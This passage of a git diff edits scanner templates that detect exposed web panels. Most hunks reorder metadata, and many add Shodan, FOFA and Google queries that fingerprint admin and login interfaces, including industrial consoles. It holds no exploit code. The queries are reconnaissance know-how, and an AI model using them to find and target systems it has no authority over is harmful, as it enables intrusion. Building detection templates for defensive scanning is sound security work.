cpe:2.3:a:miniweb_http_server_project:miniweb_http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: miniweb_http_server vendor: miniweb_http_server_project + product: miniweb_http_server tags: edb,panel,miniweb_http_server_project http: diff --git a/http/exposed-panels/minio-browser.yaml b/http/exposed-panels/minio-browser.yaml index 46d3b2ecc6..b106f768a5 100644 --- a/http/exposed-panels/minio-browser.yaml +++ b/http/exposed-panels/minio-browser.yaml @@ -11,9 +11,20 @@ info: cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: minio - shodan-query: title:"MinIO Browser" vendor: minio + product: minio + shodan-query: + - title:"MinIO Browser" + - http.title:"minio browser" + - cpe:"cpe:2.3:a:minio:minio" + - http.title:"minio console" + fofa-query: + - app="minio" + - title="minio browser" + - title="minio console" + google-query: + - intitle:"minio browser" + - intitle:"minio console" tags: panel,minio http: diff --git a/http/exposed-panels/minio-console.yaml b/http/exposed-panels/minio-console.yaml index 77ffc45b7a..dce33da761 100644 --- a/http/exposed-panels/minio-console.yaml +++ b/http/exposed-panels/minio-console.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="MinIO-Console" max-request: 1 shodan-query: title:"MinIO Console" + fofa-query: app="MinIO-Console" tags: panel,minio http: diff --git a/http/exposed-panels/misp-panel.yaml b/http/exposed-panels/misp-panel.yaml index 16b06e9fb9..df3e0c1dde 100644 --- a/http/exposed-panels/misp-panel.yaml +++ b/http/exposed-panels/misp-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:misp:misp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: misp - shodan-query: http.title:"Users - MISP" - vendor: misp verified: "true" + max-request: 1 + vendor: misp + product: misp + shodan-query: + - http.title:"Users - MISP" + - http.title:"users - misp" + fofa-query: title="users - misp" + google-query: intitle:"users - misp" tags: panel,misp http: diff --git a/http/exposed-panels/mitel-micollab-panel.yaml b/http/exposed-panels/mitel-micollab-panel.yaml index aa1a34cd53..de3d810e5e 100644 --- a/http/exposed-panels/mitel-micollab-panel.yaml +++ b/http/exposed-panels/mitel-micollab-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.mitel.com/products/micollab-miteam-meetings-collaboration-software metadata: + verified: true max-request: 1 shodan-query: http.html:"MiCollab End User Portal" - verified: true tags: panel,mitel,login,detect http: diff --git a/http/exposed-panels/mitel-panel-detect.yaml b/http/exposed-panels/mitel-panel-detect.yaml index 33abfab6bd..b4fe47dc2b 100644 --- a/http/exposed-panels/mitel-panel-detect.yaml +++ b/http/exposed-panels/mitel-panel-detect.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mitel:cmg_suite:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: cmg_suite - shodan-query: http.html:"Mitel Networks" - vendor: mitel verified: true + max-request: 2 + vendor: mitel + product: cmg_suite + shodan-query: + - http.html:"Mitel Networks" + - http.html:"mitel networks" + fofa-query: body="mitel networks" tags: panel,mitel http: diff --git a/http/exposed-panels/mitric-checker-panel.yaml b/http/exposed-panels/mitric-checker-panel.yaml index 2e5db90096..87f1f081d9 100644 --- a/http/exposed-panels/mitric-checker-panel.yaml +++ b/http/exposed-panels/mitric-checker-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.mitric.com/en/audit-with-checker/ metadata: - max-request: 2 verified: true + max-request: 2 tags: panel,mitric,login,detect http: diff --git a/http/exposed-panels/mobile-management-panel.yaml b/http/exposed-panels/mobile-management-panel.yaml index 1bbe3f00db..6ddcc21bdb 100644 --- a/http/exposed-panels/mobile-management-panel.yaml +++ b/http/exposed-panels/mobile-management-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="移动管理平台-企业管理" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="移动管理平台-企业管理" tags: panel,mobile,management http: diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml index 2741bb9a06..cb20c289af 100644 --- a/http/exposed-panels/mobileiron-sentry.yaml +++ b/http/exposed-panels/mobileiron-sentry.yaml @@ -8,9 +8,9 @@ info: reference: - https://help.ivanti.com/mi/help/en_us/sntry/9.9.0/gdcl/Content/SentryGuide/MobileIron_Sentry_overvi.htm metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:967636089 - verified: true tags: panel,mobileiron http: diff --git a/http/exposed-panels/modoboa-panel.yaml b/http/exposed-panels/modoboa-panel.yaml index 18622fd964..6e83630de5 100644 --- a/http/exposed-panels/modoboa-panel.yaml +++ b/http/exposed-panels/modoboa-panel.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:modoboa:*:*:* metadata: - max-request: 2 - product: modoboa - shodan-query: http.favicon.hash:1949005079 - vendor: modoboa verified: true + max-request: 2 + vendor: modoboa + product: modoboa + shodan-query: + - http.favicon.hash:1949005079 + - http.html:"modoboa" + fofa-query: + - body="modoboa" + - icon_hash=1949005079 tags: panel,modoboa,mail http: diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml index 824c38fc0f..2d77df6a03 100644 --- a/http/exposed-panels/monitorr-panel.yaml +++ b/http/exposed-panels/monitorr-panel.yaml @@ -7,8 +7,8 @@ info: metadata: verified: true max-request: 1 - fofa-query: icon_hash="-211006074" shodan-query: http.favicon.hash:-211006074 + fofa-query: icon_hash="-211006074" tags: panel,monitorr,detect http: diff --git a/http/exposed-panels/monstra-admin-panel.yaml b/http/exposed-panels/monstra-admin-panel.yaml index a1cfbb7446..1fb2f60be0 100644 --- a/http/exposed-panels/monstra-admin-panel.yaml +++ b/http/exposed-panels/monstra-admin-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: monstra product: monstra_cms shodan-query: http.favicon.hash:419828698 - vendor: monstra - verified: true + fofa-query: icon_hash=419828698 tags: panel,monstra http: diff --git a/http/exposed-panels/moodle-workplace-panel.yaml b/http/exposed-panels/moodle-workplace-panel.yaml index 664ae7c57b..401caa49aa 100644 --- a/http/exposed-panels/moodle-workplace-panel.yaml +++ b/http/exposed-panels/moodle-workplace-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://moodle.com/solutions/workplace/ metadata: + verified: true max-request: 1 shodan-query: http.html:"moodle" - verified: true tags: panel,moodle,login,detect http: diff --git a/http/exposed-panels/movable-type-login.yaml b/http/exposed-panels/movable-type-login.yaml index 5a2c684c1f..604bd7929e 100644 --- a/http/exposed-panels/movable-type-login.yaml +++ b/http/exposed-panels/movable-type-login.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:-:*:*:* metadata: max-request: 2 - product: movable_type - shodan-query: title:"サインイン | Movable Type Pro" vendor: sixapart + product: movable_type + shodan-query: + - title:"サインイン | Movable Type Pro" + - cpe:"cpe:2.3:a:sixapart:movable_type" + - http.title:"サインイン | movable type pro" + fofa-query: title="サインイン | movable type pro" + google-query: intitle:"サインイン | movable type pro" tags: panel,movable,sixapart http: diff --git a/http/exposed-panels/mpftvc-admin-panel.yaml b/http/exposed-panels/mpftvc-admin-panel.yaml index ea4e37d4a5..3a16c48408 100644 --- a/http/exposed-panels/mpftvc-admin-panel.yaml +++ b/http/exposed-panels/mpftvc-admin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"AdminLogin - MPFTVC" - verified: true tags: panel,mpftvc,admin http: diff --git a/http/exposed-panels/mpsec-isg1000-panel.yaml b/http/exposed-panels/mpsec-isg1000-panel.yaml index 9bac4c2874..deca6872b1 100644 --- a/http/exposed-panels/mpsec-isg1000-panel.yaml +++ b/http/exposed-panels/mpsec-isg1000-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: 迈普通信技术股份有限公司 - max-request: 1 verified: true + max-request: 1 + fofa-query: 迈普通信技术股份有限公司 tags: panel,login,mpsec,isg1000 http: diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index 2b10435e59..3b158fd34a 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -12,12 +12,19 @@ info: classification: cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: exchange_server - shodan-query: http.favicon.hash:1768726119 - vendor: microsoft verified: true - tags: ms,microsoft,exchange,tech + max-request: 2 + vendor: microsoft + product: "exchange_server" + shodan-query: + - "http.favicon.hash:1768726119" + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - icon_hash=1768726119 + - title="outlook" + google-query: intitle:"outlook" + tags: ms,microsoft,exchange,tech,panel http: - method: GET diff --git a/http/exposed-panels/mspcontrol-login.yaml b/http/exposed-panels/mspcontrol-login.yaml index 922d329190..ec09178e35 100644 --- a/http/exposed-panels/mspcontrol-login.yaml +++ b/http/exposed-panels/mspcontrol-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"MSPControl - Sign In" max-request: 1 shodan-query: http.title:"MSPControl - Sign In" + google-query: intitle:"MSPControl - Sign In" tags: panel,mspcontrol http: diff --git a/http/exposed-panels/mybb-forum-detect.yaml b/http/exposed-panels/mybb-forum-detect.yaml index dcea77b3ba..7929b04261 100644 --- a/http/exposed-panels/mybb-forum-detect.yaml +++ b/http/exposed-panels/mybb-forum-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: mybb - shodan-query: http.title:"MyBB" - vendor: mybb verified: true + max-request: 1 + vendor: mybb + product: mybb + shodan-query: + - http.title:"MyBB" + - http.title:"mybb" + fofa-query: title="mybb" + google-query: intitle:"mybb" tags: panel,mybb,forum http: diff --git a/http/exposed-panels/mybb/mybb-forum-install.yaml b/http/exposed-panels/mybb/mybb-forum-install.yaml index 5a196f0c86..94aafb3247 100644 --- a/http/exposed-panels/mybb/mybb-forum-install.yaml +++ b/http/exposed-panels/mybb/mybb-forum-install.yaml @@ -11,11 +11,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: mybb - shodan-query: http.title:"MyBB" - vendor: mybb verified: true + max-request: 1 + vendor: mybb + product: mybb + shodan-query: + - http.title:"MyBB" + - http.title:"mybb" + fofa-query: title="mybb" + google-query: intitle:"mybb" tags: panel,mybb,forum http: diff --git a/http/exposed-panels/mylittleadmin-panel.yaml b/http/exposed-panels/mylittleadmin-panel.yaml index a3237e9e19..e1d131b6cb 100644 --- a/http/exposed-panels/mylittleadmin-panel.yaml +++ b/http/exposed-panels/mylittleadmin-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.html:"myLittleAdmin" - verified: true tags: panel,mylittleadmin,login http: diff --git a/http/exposed-panels/mylittlebackup-panel.yaml b/http/exposed-panels/mylittlebackup-panel.yaml index 8ec72eb852..e9d54daae3 100644 --- a/http/exposed-panels/mylittlebackup-panel.yaml +++ b/http/exposed-panels/mylittlebackup-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"myLittleBackup" - verified: true tags: panel,mylittlebackup http: diff --git a/http/exposed-panels/mystrom-panel.yaml b/http/exposed-panels/mystrom-panel.yaml index 0d6189c806..600dea0694 100644 --- a/http/exposed-panels/mystrom-panel.yaml +++ b/http/exposed-panels/mystrom-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"myStrom" - verified: true tags: panel,mystrom,iot http: diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index 624de3d45d..88df986fe8 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -1,19 +1,19 @@ id: n8n-panel -info: - name: n8n Panel - Detect - author: userdehghani - severity: info - description: | - The worlds most popular workflow automation platform for technical teams - reference: - - https://n8n.io/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:-831756631 - tags: panel,n8n,login,detect - +info: + name: n8n Panel - Detect + author: userdehghani + severity: info + description: | + The worlds most popular workflow automation platform for technical teams + reference: + - https://n8n.io/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-831756631 + tags: panel,n8n,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/nagios-panel.yaml b/http/exposed-panels/nagios-panel.yaml index cee463eb8d..04926813ba 100644 --- a/http/exposed-panels/nagios-panel.yaml +++ b/http/exposed-panels/nagios-panel.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nagios:nagios:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: nagios product: nagios shodan-query: http.title:"nagios" - vendor: nagios - verified: true + fofa-query: title="nagios" + google-query: intitle:"nagios" tags: panel,nagios http: diff --git a/http/exposed-panels/nagios-xi-panel.yaml b/http/exposed-panels/nagios-xi-panel.yaml index f01ff51d81..407b183783 100644 --- a/http/exposed-panels/nagios-xi-panel.yaml +++ b/http/exposed-panels/nagios-xi-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: nagios_xi - shodan-query: http.title:"Nagios XI" - vendor: nagios verified: true + max-request: 2 + vendor: nagios + product: nagios_xi + shodan-query: + - http.title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" tags: panel,nagios,nagios-xi http: diff --git a/http/exposed-panels/nagvis-panel.yaml b/http/exposed-panels/nagvis-panel.yaml index 08c25860be..834bb14266 100644 --- a/http/exposed-panels/nagvis-panel.yaml +++ b/http/exposed-panels/nagvis-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nagvis:nagvis:*:*:*:*:nagios_xi:*:*:* metadata: - max-request: 2 - product: nagvis - shodan-query: http.html:"NagVis" - vendor: nagvis verified: true + max-request: 2 + vendor: nagvis + product: nagvis + shodan-query: + - http.html:"NagVis" + - http.html:"nagvis" + fofa-query: body="nagvis" tags: panel,nagvis http: diff --git a/http/exposed-panels/navicat-server-panel.yaml b/http/exposed-panels/navicat-server-panel.yaml index bd70ad4dca..8c559d9eda 100644 --- a/http/exposed-panels/navicat-server-panel.yaml +++ b/http/exposed-panels/navicat-server-panel.yaml @@ -7,10 +7,10 @@ info: description: | Navicat On-Prem Server is an on-premise solution that provides you with the option to host a cloud environment for storing Navicat objects internally at your location. In our On-Prem environment, you can enjoy complete control over your system and maintain 100% privacy. It is secure and reliable that allow you to maintain a level of control that the cloud often cannot. metadata: - fofa-query: icon_hash="598296063" + verified: true max-request: 2 shodan-query: http.favicon.hash:598296063 - verified: true + fofa-query: icon_hash="598296063" tags: panel,navicat,on-prem,detect http: diff --git a/http/exposed-panels/ncentral-panel.yaml b/http/exposed-panels/ncentral-panel.yaml index da3aa0895b..618b1a49b0 100644 --- a/http/exposed-panels/ncentral-panel.yaml +++ b/http/exposed-panels/ncentral-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"N-central Login" - verified: true tags: panel,n-central http: diff --git a/http/exposed-panels/nconf-panel.yaml b/http/exposed-panels/nconf-panel.yaml index 4daf13fbc9..2b6ea83d55 100644 --- a/http/exposed-panels/nconf-panel.yaml +++ b/http/exposed-panels/nconf-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"nconf" - verified: true tags: panel,nconf http: diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index aaf0bee5cf..6c4d500a38 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:neo4j:neo4j:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: neo4j - shodan-query: http.title:"Neo4j Browser" vendor: neo4j + product: neo4j + shodan-query: + - http.title:"Neo4j Browser" + - http.title:"neo4j browser" + fofa-query: title="neo4j browser" + google-query: intitle:"neo4j browser" tags: neo4j,exposure,unauth,panel http: diff --git a/http/exposed-panels/neobox-panel.yaml b/http/exposed-panels/neobox-panel.yaml index a0e3b76d90..94b83fea98 100644 --- a/http/exposed-panels/neobox-panel.yaml +++ b/http/exposed-panels/neobox-panel.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="neobox-Web-Server" + verified: true max-request: 1 shodan-query: http.html:"NeoboxUI" - verified: true + fofa-query: app="neobox-Web-Server" tags: panel,neobox,webserver http: diff --git a/http/exposed-panels/neocase-hrportal-panel.yaml b/http/exposed-panels/neocase-hrportal-panel.yaml index c23e7c9e89..7a73044b1d 100644 --- a/http/exposed-panels/neocase-hrportal-panel.yaml +++ b/http/exposed-panels/neocase-hrportal-panel.yaml @@ -10,8 +10,8 @@ info: - https://www.neocasesoftware.com/neocase-hr-solution/ - https://www.neocasesoftware.com/self-service-portal-module/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,neocase,login,detect http: diff --git a/http/exposed-panels/nessus-panel.yaml b/http/exposed-panels/nessus-panel.yaml index 588f857b3c..345df8aab6 100644 --- a/http/exposed-panels/nessus-panel.yaml +++ b/http/exposed-panels/nessus-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: nessus - shodan-query: title:"Nessus" - vendor: tenable verified: true + max-request: 2 + vendor: tenable + product: nessus + shodan-query: + - title:"Nessus" + - http.title:"nessus" + fofa-query: title="nessus" + google-query: intitle:"nessus" tags: panel,nessus,tenable http: diff --git a/http/exposed-panels/netdata-dashboard-detected.yaml b/http/exposed-panels/netdata-dashboard-detected.yaml index a5a83daaa3..d0556067eb 100644 --- a/http/exposed-panels/netdata-dashboard-detected.yaml +++ b/http/exposed-panels/netdata-dashboard-detected.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:netdata:netdata:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netdata - shodan-query: 'Server: NetData Embedded HTTP Server' vendor: netdata + product: netdata + shodan-query: + - 'Server: NetData Embedded HTTP Server' + - http.title:"netdata dashboard" + - "server: netdata embedded http server" + fofa-query: title="netdata dashboard" + google-query: intitle:"netdata dashboard" tags: netdata,panel,tech http: diff --git a/http/exposed-panels/netdata-panel.yaml b/http/exposed-panels/netdata-panel.yaml index 26798b2611..d5b705b389 100644 --- a/http/exposed-panels/netdata-panel.yaml +++ b/http/exposed-panels/netdata-panel.yaml @@ -14,9 +14,13 @@ info: cpe: cpe:2.3:a:netdata:netdata:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netdata - shodan-query: http.title:"netdata dashboard" vendor: netdata + product: netdata + shodan-query: + - http.title:"netdata dashboard" + - "server: netdata embedded http server" + fofa-query: title="netdata dashboard" + google-query: intitle:"netdata dashboard" tags: panel,netdata http: diff --git a/http/exposed-panels/netflix-conductor-ui.yaml b/http/exposed-panels/netflix-conductor-ui.yaml index 0462ba72f9..1b24a608ec 100644 --- a/http/exposed-panels/netflix-conductor-ui.yaml +++ b/http/exposed-panels/netflix-conductor-ui.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:netflix:conductor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: conductor - shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" vendor: netflix + product: conductor + shodan-query: + - http.title:"Conductor UI", http.title:"Workflow UI" + - http.title:"conductor ui", http.title:"workflow ui" + fofa-query: title="conductor ui", http.title:"workflow ui" + google-query: intitle:"conductor ui", http.title:"workflow ui" tags: webserver,netflix,conductor,panel http: diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 7d995d74b9..3183b8cc23 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:citrix:netscaler:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netscaler vendor: citrix + product: netscaler tags: panel,netscaler,login,edb,citrix,detect http: diff --git a/http/exposed-panels/netscaler-gateway.yaml b/http/exposed-panels/netscaler-gateway.yaml index cd5bb833e0..95aac8af1e 100644 --- a/http/exposed-panels/netscaler-gateway.yaml +++ b/http/exposed-panels/netscaler-gateway.yaml @@ -5,16 +5,16 @@ info: author: joeldeleep severity: info description: Citrix NetScaler is an application delivery controller that improves the delivery speed and quality of applications to an end user. + remediation: Ensure proper access. reference: - https://stack.watch/product/citrix/netscaler-gateway/ - remediation: Ensure proper access. classification: cwe-id: CWE-200 cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netscaler_gateway vendor: citrix + product: netscaler_gateway tags: panel,netscaler,citrix http: diff --git a/http/exposed-panels/netsparker-panel.yaml b/http/exposed-panels/netsparker-panel.yaml index 3880f122f5..ef3ab1d1d3 100644 --- a/http/exposed-panels/netsparker-panel.yaml +++ b/http/exposed-panels/netsparker-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Sign in to Netsparker Enterprise" - verified: true tags: panel,netsparker http: diff --git a/http/exposed-panels/nexus-panel.yaml b/http/exposed-panels/nexus-panel.yaml index 2d0faf7e38..2496d2bc4a 100644 --- a/http/exposed-panels/nexus-panel.yaml +++ b/http/exposed-panels/nexus-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.sonatype.com/products/sonatype-nexus-repository metadata: + verified: true max-request: 1 shodan-query: http.title:"Sonatype Nexus Repository" - verified: true tags: panel,nexus,login,detect http: diff --git a/http/exposed-panels/nginx-admin-panel.yaml b/http/exposed-panels/nginx-admin-panel.yaml index 43dcf7b921..ccdddd90ad 100644 --- a/http/exposed-panels/nginx-admin-panel.yaml +++ b/http/exposed-panels/nginx-admin-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"nginx admin manager" - verified: true tags: panel,nginx,admin http: diff --git a/http/exposed-panels/nginx-ui-dashboard.yaml b/http/exposed-panels/nginx-ui-dashboard.yaml index 79966ae719..339c74d795 100644 --- a/http/exposed-panels/nginx-ui-dashboard.yaml +++ b/http/exposed-panels/nginx-ui-dashboard.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: nginx - shodan-query: http.title:"nginx ui" - vendor: f5 verified: true + max-request: 1 + vendor: f5 + product: nginx + shodan-query: + - http.title:"nginx ui" + - cpe:"cpe:2.3:a:f5:nginx" + fofa-query: title="nginx ui" + google-query: intitle:"nginx ui" tags: panel,nginx,exposure,f5 http: diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 14b35e026c..d23fbed5f2 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -1,20 +1,20 @@ id: nocodb-panel -info: - name: NocoDB Panel - Detect - author: userdehghani - severity: info - description: | - NocoDB Login panel was discovered. - reference: - - https://www.nocodb.com/ - - https://docs.nocodb.com/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:206985584 - tags: panel,nocodb,login,detect - +info: + name: NocoDB Panel - Detect + author: userdehghani + severity: info + description: | + NocoDB Login panel was discovered. + reference: + - https://www.nocodb.com/ + - https://docs.nocodb.com/ + metadata: + verified: true + max-request: 2 + shodan-query: "http.favicon.hash:206985584" + tags: panel,nocodb,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/noescape-login.yaml b/http/exposed-panels/noescape-login.yaml index a9905cdc35..c60b13b383 100644 --- a/http/exposed-panels/noescape-login.yaml +++ b/http/exposed-panels/noescape-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"NoEscape - Login" - verified: true tags: panel,noescape http: diff --git a/http/exposed-panels/nordex-wind-farm-portal.yaml b/http/exposed-panels/nordex-wind-farm-portal.yaml index ecf2b77d53..29e274e6a9 100644 --- a/http/exposed-panels/nordex-wind-farm-portal.yaml +++ b/http/exposed-panels/nordex-wind-farm-portal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Nordex Control" - verified: true tags: panel,nordex,iot http: diff --git a/http/exposed-panels/normhost-backup-server-manager.yaml b/http/exposed-panels/normhost-backup-server-manager.yaml index 1c0cf7f445..ac4ce40dbe 100644 --- a/http/exposed-panels/normhost-backup-server-manager.yaml +++ b/http/exposed-panels/normhost-backup-server-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Normhost Backup server manager" - verified: true tags: panel,normhost http: diff --git a/http/exposed-panels/novnc-login-panel.yaml b/http/exposed-panels/novnc-login-panel.yaml index a911a38285..99ba4c734a 100644 --- a/http/exposed-panels/novnc-login-panel.yaml +++ b/http/exposed-panels/novnc-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"noVNC" - verified: true tags: panel,novnc http: diff --git a/http/exposed-panels/nozomi-panel.yaml b/http/exposed-panels/nozomi-panel.yaml index 5559224113..f0257dd0e0 100644 --- a/http/exposed-panels/nozomi-panel.yaml +++ b/http/exposed-panels/nozomi-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Please Login | Nozomi Networks Console" - verified: true tags: panel,nozomi http: diff --git a/http/exposed-panels/np-data-cache.yaml b/http/exposed-panels/np-data-cache.yaml index 18f3f2d729..5b4ecbfda6 100644 --- a/http/exposed-panels/np-data-cache.yaml +++ b/http/exposed-panels/np-data-cache.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"NP Data Cache" - verified: true tags: np,panel,cache http: diff --git a/http/exposed-panels/nport-web-console.yaml b/http/exposed-panels/nport-web-console.yaml index 2b5dccb466..ab4a7e8b49 100644 --- a/http/exposed-panels/nport-web-console.yaml +++ b/http/exposed-panels/nport-web-console.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"NPort Web Console" - verified: true tags: panel,nport http: diff --git a/http/exposed-panels/nsq-admin-panel.yaml b/http/exposed-panels/nsq-admin-panel.yaml index 49402edaa0..3f92170ef1 100644 --- a/http/exposed-panels/nsq-admin-panel.yaml +++ b/http/exposed-panels/nsq-admin-panel.yaml @@ -12,9 +12,9 @@ info: cvss-score: 6.5 cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"nsqadmin" - verified: true tags: 